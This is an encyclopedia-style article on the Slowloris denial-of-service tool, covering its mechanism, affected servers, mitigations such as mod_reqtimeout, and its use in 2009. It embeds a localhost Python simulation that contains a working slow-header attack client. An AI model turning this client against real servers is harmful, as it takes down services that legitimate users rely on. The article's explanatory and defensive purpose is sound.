Slowloris (computer security)

Slowloris
Initial release: 17 June 2009
Stable release: 0.7
Written in: Perl
Platform: Cross-platform
Size: 36 kB
Type: Hacking tool
Website: ha.ckers.org/slowloris/

Slowloris is a denial of service attack tool that allows a single machine to take down another machine's web server using minimal bandwidth, with minimal side effects on unrelated services and ports on the target.

Slowloris tries to open many connections to the target web server and hold them open as long as possible. It accomplishes this by opening connections to the target and sending a partial HTTP request: a request line and some headers, but never the blank line that terminates the header block. Periodically it sends further HTTP headers, adding to, but never completing, the request. Servers that dedicate a worker process or thread to each connection, and that place no limit on how long the header phase may last, keep these connections open until their maximum concurrent connection pool is exhausted, at which point further connection attempts from legitimate clients are refused or left waiting. Because each held connection carries only a few bytes every few seconds, the attack needs very little bandwidth. [1]

The program was named after slow lorises, a group of primates known for their slow movement.

Affected web servers

This includes but is not necessarily limited to the following, per the attack's author: [1]

Vulnerable to Slowloris attack on the TLS handshake process:

Because Slowloris exploits the cost of holding thousands of idle connections, the attack has less of an effect on servers that handle large numbers of concurrent connections cheaply, typically event-driven servers rather than those that assign a process or thread to each connection. Proxying servers and caching accelerators such as Varnish, nginx, and Squid have been recommended [7] to mitigate this particular kind of attack. In addition, certain servers are more resilient to the attack by way of their design, including Hiawatha, [8] IIS, lighttpd, Cherokee, and Cisco CSS.

Mitigating the Slowloris attack

While there is no configuration of the affected web servers that reliably prevents the Slowloris attack, there are ways to mitigate or reduce its impact. In general, these involve increasing the maximum number of clients the server will allow, limiting the number of connections a single IP address is allowed to make, requiring a minimum transfer rate from each connection, and restricting the length of time a client is allowed to stay connected while its request is still incomplete.

In the Apache web server, a number of modules can be used to limit the damage caused by the Slowloris attack; the Apache modules mod_limitipconn, mod_qos, mod_evasive, mod_security (ModSecurity), mod_noloris, and mod_antiloris have all been suggested as means of reducing the likelihood of a successful Slowloris attack. [1] [9] Since Apache 2.2.15, Apache ships the module mod_reqtimeout as the official solution supported by the developers. [10]
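To make the mechanism described above and the time-limit mitigation concrete, the following is an added, self-contained Python simulation; it is not the original Perl tool and not any server's or module's code. It runs a toy HTTP server with a fixed worker pool on localhost, a Slowloris-style client that holds partial requests open and dribbles bogus headers into them, and a well-behaved client that tries to get through. Names such as WORKERS, SLOW_CONNS, header_mode and simulate() are invented for this example, as are the timing parameters. It also shows the trap practitioners hit when "restricting the length of time a client is allowed to stay connected": a per-read timeout that is reset whenever a byte arrives (this is how Apache's classic Timeout directive behaves) does nothing against Slowloris, because the tool always sends something before it expires, whereas a single total budget for the whole header phase, which is what mod_reqtimeout's RequestReadTimeout header=20-40,MinRate=500 expresses, drops the held connections and lets the legitimate request through.

```python
import socket
import threading
import time

# Constructed parameters for this demonstration (hypothetical; not from the tool).
WORKERS = 4         # fixed worker pool, like Apache prefork's MaxClients
SLOW_CONNS = 8      # the attacker holds more connections than there are workers
PARTIAL_REQUEST = b"GET / HTTP/1.1\r\nHost: target\r\nUser-Agent: example\r\n"  # no blank line
KEEPALIVE_HEADER = b"X-a: b\r\n"  # bogus header dribbled in to keep the request incomplete
RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok"


def start_server(header_mode, header_timeout):
    """Toy server with a fixed worker pool; returns (port, shutdown_fn).
    header_mode: None (no limit), 'per_read' (timeout reset on every read,
    like Apache's Timeout), or 'deadline' (one budget for the whole header phase)."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(64)
    lsock.settimeout(0.2)  # lets workers notice shutdown; accepted sockets stay blocking
    port = lsock.getsockname()[1]
    stop = threading.Event()

    def handle(conn):
        buf = b""
        deadline = time.monotonic() + (header_timeout or 0.0)
        with conn:
            try:
                while b"\r\n\r\n" not in buf:  # the worker is tied up until headers complete
                    if header_mode == "per_read":
                        conn.settimeout(header_timeout)
                    elif header_mode == "deadline":
                        remaining = deadline - time.monotonic()
                        if remaining <= 0:
                            return  # budget exhausted: drop the connection
                        conn.settimeout(remaining)
                    chunk = conn.recv(4096)
                    if not chunk:
                        return  # client went away
                    buf += chunk
                conn.sendall(RESPONSE)
            except OSError:  # read timeout or reset: drop the connection, free the worker
                return

    def worker():
        while not stop.is_set():
            try:
                conn, _ = lsock.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            handle(conn)

    for _ in range(WORKERS):
        threading.Thread(target=worker, daemon=True).start()

    def shutdown():
        stop.set()
        lsock.close()

    return port, shutdown


class SlowClient:
    """Slowloris-style client: opens partial requests and never finishes them."""

    def __init__(self, port, count, interval):
        self.socks = []
        for _ in range(count):
            s = socket.create_connection(("127.0.0.1", port))
            s.sendall(PARTIAL_REQUEST)
            self.socks.append(s)
        self.stop = threading.Event()
        threading.Thread(target=self._drip, args=(interval,), daemon=True).start()

    def _drip(self, interval):
        while not self.stop.wait(interval):
            for s in self.socks:
                try:
                    s.sendall(KEEPALIVE_HEADER)  # a few bytes per connection per interval
                except OSError:
                    pass  # the server dropped this connection

    def close(self):
        self.stop.set()
        for s in self.socks:
            s.close()


def legit_request(port, timeout):
    """A well-behaved client; True if it receives a 200 within `timeout` seconds."""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.1\r\nHost: target\r\n\r\n")
            return s.recv(1024).startswith(b"HTTP/1.1 200")
    except OSError:  # includes the read timeout
        return False


def simulate(header_mode, header_timeout=0.25, client_timeout=1.5):
    """Attack one server configuration; True if the legitimate client got through."""
    port, shutdown = start_server(header_mode, header_timeout)
    attacker = SlowClient(port, SLOW_CONNS, interval=0.05)
    time.sleep(0.1)  # let the workers pick up the first SLOW_CONNS connections
    try:
        return legit_request(port, client_timeout)
    finally:
        attacker.close()
        shutdown()


if __name__ == "__main__":
    for mode in (None, "per_read", "deadline"):
        print(f"{mode!s:>9}: legitimate request served = {simulate(mode)}")
```

With no limit and with a per-read timeout the legitimate client waits on a full worker pool until its own timeout expires; with a header-phase deadline each held connection is dropped after the budget, the backlog drains, and the request is answered. The same per-read versus total-budget distinction is why raising a server's generic read timeout does not help, while mod_reqtimeout, nginx's client_header_timeout (which bounds the whole header phase) or a reverse proxy in front of a thread-per-connection server does.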

Other mitigating techniques involve setting up reverse proxies, firewalls, load balancers or content switches. [11] Administrators could also change the affected web server to software that is unaffected by this form of attack. For example, lighttpd and nginx do not succumb to this specific attack. [1]

Notable usage

During the protests that erupted in the wake of the 2009 Iranian presidential election, Slowloris arose as a prominent tool used to leverage DoS attacks against sites run by the Iranian government. [12] The belief was that flooding DDoS attacks would affect internet access for the government and protesters equally, due to the significant bandwidth they can consume. The Slowloris attack was chosen instead, because of its high impact and relatively low bandwidth. [13] A number of government-run sites were targeted during these attacks, including gerdab.ir, leader.ir, and president.ir. [14]

A variant of this attack was used by spam network River City Media to force Gmail servers to send thousands of messages in bulk, by opening thousands of connections to the Gmail API with message sending requests, then completing them all at once. [15]

Similar software

Since its release, a number of programs have appeared that mimic the function of Slowloris while providing additional functionality, or running in different environments: [16]

References

  1. "Slowloris HTTP DoS". Archived from the original on 26 April 2015. Retrieved 26 June 2009.
  2. "Archived copy" (PDF). Archived from the original (PDF) on 1 February 2014. Retrieved 15 May 2013.
  3. "Slowloris". www.powerwaf.com. Retrieved 17 July 2023.
  4. "Slowloris". www.powerwaf.com. Retrieved 17 July 2023.
  5. "Slowloris". www.powerwaf.com. Retrieved 17 July 2023.
  6. "Slowloris". www.powerwaf.com. Retrieved 17 July 2023.
  7. "How to best defend against a "slowloris" DOS attack against an Apache web server?". serverfault.com. Retrieved 28 December 2016.
  8. "Performance testing while under attack". hiawatha-webserver.org. 28 February 2014.
  9. "mod_noloris: defending against DoS". niq's soapbox. July 2009. Retrieved 7 January 2012.
  10. "mod_reqtimeout - Apache HTTP Server". Httpd.apache.org. Retrieved 3 July 2013.
  11. Breedijk, Frank (22 June 2009). "Slowloris and Nkiller2 vs. the Cisco CSS load balancer". Cupfighter.net. Archived from the original on 15 February 2012. Retrieved 7 January 2012.
  12. Zdrnja, Bojan (23 June 2009). "ISC Diary | Slowloris and Iranian DDoS attacks". Isc.sans.org. Retrieved 7 January 2012.
  13. Archived 29 June 2009 at the Wayback Machine
  14. Archived 11 August 2009 at the Wayback Machine
  15. Vickery, Chris (6 March 2017). "Spammergate: The Fall of an Empire". MacKeeper Security Watch. Archived from the original on 6 March 2017.
  16. Robert "RSnake" Hansen. "Slowloris" (PDF). SecTheory. Retrieved 7 January 2012.
  17. "PyLoris". MotomaSTYLE. 19 June 2009. Archived from the original on 15 July 2009. Retrieved 7 January 2012.
  18. "Slowloris rewrite in Python". GitHub. Retrieved 10 May 2017.
  19. valyala. "Slowloris for nginx DoS". GitHub. Retrieved 4 February 2014.
  20. Tsankov, Ivaylo (22 April 2022). slowloris - Golang distributed Slowloris attack. Retrieved 24 April 2022.
  21. "How to help take down gerdab.ir in 5 easy steps". cyberwar4iran. 28 June 2009. Retrieved 7 January 2012.
  22. "Full Disclosure: apache and squid dos". Seclists.org. 19 June 2009. Retrieved 7 January 2012.
  23. "Testing Web Servers for Slow HTTP Attacks". qualys.com. 19 September 2011. Retrieved 13 January 2012.
  24. "shekyan/slowhttptest: Application Layer DoS attack simulator". GitHub. Retrieved 19 April 2017.
  25. "Simple script to check if some server could be affected by Slowloris attack". github.com/felmoltor. 31 December 2012. Retrieved 31 December 2012.
  26. abilash. "Slowloris for OSX". GitHub. Retrieved 8 April 2017.
  27. Davis, Ethan (17 February 2018). sloww: Lightweight Slowloris attack CLI in Node. Retrieved 18 February 2018.
  28. Bassel Shmali (28 November 2021). "Slowloris written in .Net core". GitHub.
  29. Cambiaso, Enrico; Papaleo, Gianluca; Aiello, Maurizio (2014). "SlowDroid: Turning a Smartphone into a Mobile Attack Vector". 2014 International Conference on Future Internet of Things and Cloud. pp. 405–410. doi:10.1109/FiCloud.2014.72. ISBN   978-1-4799-4357-9. S2CID   14792419.